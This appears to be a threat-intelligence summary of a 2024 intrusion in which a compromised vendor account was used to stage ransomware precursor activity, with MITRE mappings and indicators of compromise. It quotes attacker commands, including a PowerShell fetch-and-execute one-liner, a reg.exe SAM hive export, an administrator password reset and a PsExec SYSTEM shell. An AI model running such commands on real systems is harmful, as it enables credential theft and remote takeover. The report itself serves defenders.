Keypoints
- Compromised vendor account used to initiate an RDP session to a customer host outside monitoring scope, enabling follow-on activity.
- Attacker attempted to install Level.io RMM via a direct executable and a PowerShell one-liner that fetched install_windows.ps1 using iwr | iex.
- Reconnaissance commands were executed to enumerate local and domain users and groups (net user, net user /domain, net localgroup Administrators /domain, net localgroup “Domain Admins” /domain).
- A network discovery binary netscan.exe (MD5: 52746d457f8ec149fd13dea85b654b19) was dropped via RDP and terminated by an endpoint agent.
- Credential-dumping activity was attempted (taskmgr usage and reg.exe save hklmsam), but no SYSTEM hive was collected, suggesting SAM extraction likely failed.
- Cobalt Strike payloads were retrieved from hxxps://temp[.]sh/VWXth/cob[.]zip and executed (payload64.exe MD5: 155560e1e4ea8fcce047514a52950859); the archive contained additional fallback payloads pointing to the same C2.
- Privilege escalation attempts included resetting the Administrator password and launching a SYSTEM shell via PsExec (‘.PsExec.exe -i -s cmd.exe’).
MITRE Techniques
- [T1078] Valid Accounts – Use of a compromised vendor account to access the host via RDP (‘RDP session initiated by a compromised IT services vendor account’).
- [T1021.001] Remote Services: Remote Desktop Protocol – Actor accessed the system through RDP to perform follow-on actions (‘RDP session initiated by a compromised IT services vendor account’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Installer fetched and executed via PowerShell one-liner using Invoke-WebRequest piped to Invoke-Expression (‘iwr -useb hxxps://downloads.level[.]io/install_windows.ps1 | iex’).
- [T1105] Ingress Tool Transfer – Network discovery and payload binaries were transferred to the host via the RDP session (‘C:ProgramDatanetscannetscannetscan.exe (MD5: 52746d457f8ec149fd13dea85b654b19)’).
- [T1003.002] OS Credential Dumping: SAM – Attempt to export the SAM hive using reg.exe (‘reg.exe save hklmsam C:/Programdata/sam.save’).
- [T1219] Remote Management Software – Attempts to install Level RMM agent to maintain control of the host (PowerShell install command and direct executable install: ‘C:WindowsTemplevel-windows-amd64.exe /k /a install’).
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Use of PsExec to spawn a SYSTEM-level command shell (‘.PsExec.exe -i -s cmd.exe’).
Indicators of Compromise
- [File name] dropped/tools – netscan.exe (dropped at C:ProgramDatanetscannetscan.exe), payload64.exe (executed Cobalt Strike payload)
- [File hash, MD5] observed binaries – 52746d457f8ec149fd13dea85b654b19 (netscan.exe), 155560e1e4ea8fcce047514a52950859 (payload64.exe), 192644d5f4fc2313bca0224210c0b6c7 (cob.zip)
- [URL / Domain] payload/tool sources – hxxps://temp[.]sh/VWXth/cob[.]zip (Cobalt Strike archive), hxxps://downloads.level[.]io/install_windows.ps1 (Level.io installer script)
In February 2024 a vendor account was used to RDP into a customer host and execute a sequence of preparatory and offensive actions. The attacker ran numerous reconnaissance commands (net user, net user /domain, net localgroup Administrators /domain, net localgroup “Domain Admins” /domain) to map accounts and privileges, dropped a netscan binary (MD5: 52746d45…) to perform network discovery, and attempted to install Level.io agents both via a direct executable invocation and a PowerShell installer fetched with Invoke-WebRequest and piped to Invoke-Expression. Endpoint controls terminated the network scanner, but the actor persisted with further actions.
Credential access attempts were observed: the actor opened Task Manager (taskmgr.exe /4), attempted to export the SAM registry hive with reg.exe save hklmsam C:/Programdata/sam.save, and tried to reset the Administrator password (net user administrator 123!@#qweQWE /domain); the absence of a SYSTEM hive retrieval suggests SAM decryption was likely unsuccessful. Lateral/privilege escalation efforts included using PsExec to spawn a SYSTEM shell (‘.PsExec.exe -i -s cmd.exe’).
For persistence and command-and-control, the actor retrieved a Cobalt Strike archive from hxxps://temp[.]sh/VWXth/cob[.]zip (MD5: 192644d5…) containing payload64.exe (MD5: 155560e1…) plus additional fallback payloads that all pointed to the same C2, and executed the primary payload. Command prompt hygiene was maintained by frequent ‘cls’ invocations to clear history and output.
Read more: https://www.esentire.com/blog/ransomware-precursor-activity-traced-to-compromised-vendor-account